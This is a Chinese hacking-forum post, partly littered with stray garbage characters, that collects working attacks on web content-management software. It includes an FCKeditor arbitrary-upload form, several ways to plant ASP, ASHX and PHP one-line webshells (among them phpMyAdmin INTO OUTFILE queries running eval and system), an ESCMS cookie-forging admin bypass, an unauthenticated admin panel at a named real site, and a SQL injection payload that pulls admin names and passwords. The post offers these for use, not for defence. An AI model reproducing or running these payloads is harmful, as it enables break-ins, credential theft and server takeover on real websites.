http://xxoo.com/controls/fckedit ... aspx/connector.aspx
% r1 q$ R4 G+ n跳转到网站根目录上传任意文件。, O$ c2 }$ D- q$ Y
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件. w0 F5 H" V7 b1 N4 O
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">; D2 Z, m+ M- n% R/ j/ k5 ?& g" A
Upload a new file:<br>& [7 N* \# S) D0 j
<input type="file" name="NewFile" size="50"><br>
1 E7 p# `$ p8 K" j, `& }/ e<input id="btnUpload" type="submit" value="Upload">
# ]; {3 a- w" s* w( g9 u" |8 Q" |</form>" J+ ]4 h9 p8 Q8 p
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 i) ~9 V/ J, z ~$ ]5 I$ Q& u" w: W: X- M
SDcms 后台拿webshell2 Y9 } t6 S7 W9 G
" \$ M4 T7 _- B2 C- d
第一种方法:) a; }4 j/ @, @# _) B3 ?3 O
进入后台-->系统管理-->系统设置-->系统设置->网站名称; O) ^ o) A9 i5 l. C( m
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
# ~* s% j& k5 {9 I' l+ I/ ^( O用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
0 u: |9 F8 F: q, b; p( f! r9 i第二种方法:2 Y) o8 `6 p% l" k- m
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
$ x5 x, J0 r- g6 {0 B在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
7 w+ W; u/ p& m8 C! q/ ~/ ?第三种方法:) A5 p, d5 ]6 X" b8 G! G
进入后台-->界面管理-->模板文件管理-->创建文件
2 Z9 ?) {# n: u9 V. ?8 D* F文件名写入getshell.ashx
* O0 \) K3 y5 y9 b1 N- `# N+ e内容写入下面内容:3 {+ O# |$ v o9 ]
/====================复制下面的=========================/( b' o7 x$ X0 c, Z0 O
<%@ WebHandler Language="C#" Class="Handler" %>
7 q/ f+ ?* e, m4 I* _using System;0 N- E" G% ], ~+ W. w
using System.Web;
/ _' K6 E% t/ c# I" Dusing System.IO;
3 L; z! `8 s- Mpublic class Handler : IHttpHandler {
0 [* D- C1 k J8 n$ E0 g9 Wpublic void ProcessRequest (HttpContext context) {
5 ?* U3 H6 `, e; o/ h( ^1 A( hcontext.Response.ContentType = "text/plain";
* q8 @- I+ T. LStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));7 _7 V B& `/ E X
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");. i6 j7 j) A+ S/ m" x q
file1.Flush();& c8 q5 H9 e) ~. k' O- D
file1.Close();
0 A: s a$ S% d' w3 {& A8 X}" M r. e. w: F: ]
public bool IsReusable {. u5 s4 l/ E% v5 ^; V& @
get {# R1 F* |( h4 y( c& H2 v6 g( L
return false;- P6 c+ s9 q( k% F1 Z
}
" ]: @; L0 L. l3 [- |$ M: a8 W# t}
0 Z! a0 x$ l/ }1 W}
$ A# T% t1 L {/ T/ q. ~/=============================================/
6 Z3 A w6 N7 K; W) b/ ^访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
, a" M# V+ Q. ^: }2 h会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
8 j/ L- j& w" [-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------! Q1 g8 ^0 ^9 Y l
6 y. y: w' D( x
ESCMS网站管理系统0day# m% S9 [" z% e* X+ W
; i( ]/ w/ Q9 c; \9 k: v2 ^后台登陆验证是通过admin/check.asp实现的. \/ u+ Q( W c
" C" I3 O- ?( `3 E e3 q1 L& _
首先我们打开http://target.com/admin/es_index.html& _, S- j% v9 E$ B
然后在COOKIE结尾加上
. L, y* x+ f, c; ESCMS$_SP2=ES_admin=st0p;) V1 S. c3 u! I
修改,然后刷新
: Y' a3 F0 r9 @ D6 k3 q9 D进后台了嘎..3 M* g/ ]7 Q3 R: V( ?
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
2 e6 g: v1 E% o5 C5 |
5 h- W3 F( Z$ I0 i利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
1 ?& @# k$ V9 i8 h; K% {4 j* d嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp( W4 d- h3 v; H! j" e
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
) h+ n1 C }' b2 z: a. G* K; z在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
% c4 b3 q! U ^0 P$ L* E, c$ U------------------------------------------------------------------------------------------------------------------------------------------------------------------------------) n* i# }9 G+ A) g( p
; g" ^6 @1 | T4 }% K宁志网站管理系统后台无验证漏洞及修复3 @2 \5 k6 e4 k: i0 p% M
5 R& t; K/ n7 }" y网上搜了一下,好像没有发布.如有雷同纯粹巧合!
& c% M7 _& C" R9 [: v/ G8 ?2 j官方网站:www.ningzhi.net
1 k, z+ l' D. e8 S; H学校网站管理系统 V.2011版本
: W$ z- o8 N3 O0 Z. ]! uhttp://down.chinaz.com/soft/29943.htm
$ {+ B8 ]; m4 H- y0 B* k( J其它版本(如:政府版等),自行下载.$ o# j5 a$ E: E0 I# H0 B
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~6 \# H& r4 \) G0 |
login.asp代码如下:* j: l' h/ e- I! a% I: {
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
4 i* Q3 [3 i& }8 i5 I4 d. Omanage.asp代码我就不帖出来了.反正也没验证.
4 P. {( _7 n' Z& j- @1 L只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
" C* r( z% _. s8 P& p漏洞利用:
- u Y1 b, Q! \. d直接访问http://www.0855.tv/admin/manage.asp
1 t7 ^/ j( M# R Q# P& J数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
4 e. C" k3 |; v# j$ k8 l----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 Z2 H. B. O9 [; V7 t$ ~1 Z5 I6 l. V) Q8 |. i
phpmyadmin拿shell的四种方法总结及修复
; [$ f" K0 ?6 |5 }
4 \- v6 p/ x! M1 ]& S方法一:
$ v% ?& a& U7 c. SCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );1 m5 M5 l7 m# _
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
! Y2 X0 G e. h" hSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';8 v+ B7 j; |% Z6 s
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php& A9 }; m8 g" I4 F
一句话连接密码:7on) |$ g( @, M9 U; A! x
方法二:
( H2 K& E& A1 k3 I G8 v读取文件内容: select load_file('E:/xamp/www/s.php');) w' h- e# h- Y; G. m! w5 k& A
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'7 \/ ~5 P4 A. K9 \
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
+ O/ m2 b3 j" b方法三:1 |. |) S+ O* e0 A
JhackJ版本 PHPmyadmin拿shell& F; Z d, V$ L! i6 C
Create TABLE study (cmd text NOT NULL);
z: M- o1 i% ?& ], s4 aInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
# O" r; w n: v7 N. Vselect cmd from study into outfile 'E:/wamp/www/7.php';% ]# C5 U* b0 F7 ?
Drop TABLE IF EXISTS study;5 S! a. b% |9 `/ x+ U7 G& u
<?php eval($_POST[cmd])?>
" z) z0 d7 v# ~7 r9 X! gCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。( I5 w5 j' w' V6 a) Y
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1* r, x; _, P) h/ x; w/ m8 |
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
9 ?: k) v ?2 x6 \8 uDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
% b3 F( q3 K8 a' |+ |- P9 N方法四:
; [' _; e# v7 a, j# y% rselect load_file('E:/xamp/www/study.php');
+ Y% P# k# I" u2 eselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
# d O$ B9 |3 o然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
0 [: C2 l4 s. \. K* N' D1 H! _5 K-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 m" v3 B" G- m/ [# V, f" M$ g$ h) _
NO.001中学网站管理系统 Build 110628 注入漏洞' y8 \4 T! @; x
" M+ c) M/ Q9 n4 A2 |, ]7 s
NO.001中学网站管理系统功能模块:' U( y- _- }4 `" R, K. F
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等# P7 j U) Z! ]0 }5 U
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息 N1 D! {9 }1 O& D$ R
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
9 u0 u! R/ y1 o0 O$ K# M+ q4.视频图片管理:一级分类,动态添加视频或者图片等信息4 e6 p8 }" v' E4 t" }, ~
5.留言管理:对留言,修改,删除、回复等管理
, W( U* U2 |1 A# ^4 j/ Q4 M6.校友频道:包括校友资料excel导出、管理等功能) h8 k# u" D& l2 W
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页! q9 L2 ]* S8 j* i% G: f% \
默认后台:admin/login.asp
5 G+ E- V" ?8 N- F+ [9 w# n& `官方演示:http://demo.001cms.net7 ~, Q- u8 \$ |, o
源码下载地址:http://down.chinaz.com/soft/30187.htm
: [; s- k& b+ D2 |EXP:
( ~+ N1 u, O5 }% q+ ^$ h9 f! uunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
! p$ |& j( \; n! F. [( R- \测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
# h; ]1 V; W: S1 Cgetshell:后台有备份,你懂的5 o j5 v9 h( C' Z- N* q5 w
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。7 D: t# M7 u+ _" e$ r1 J* H) [- w8 a& r
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对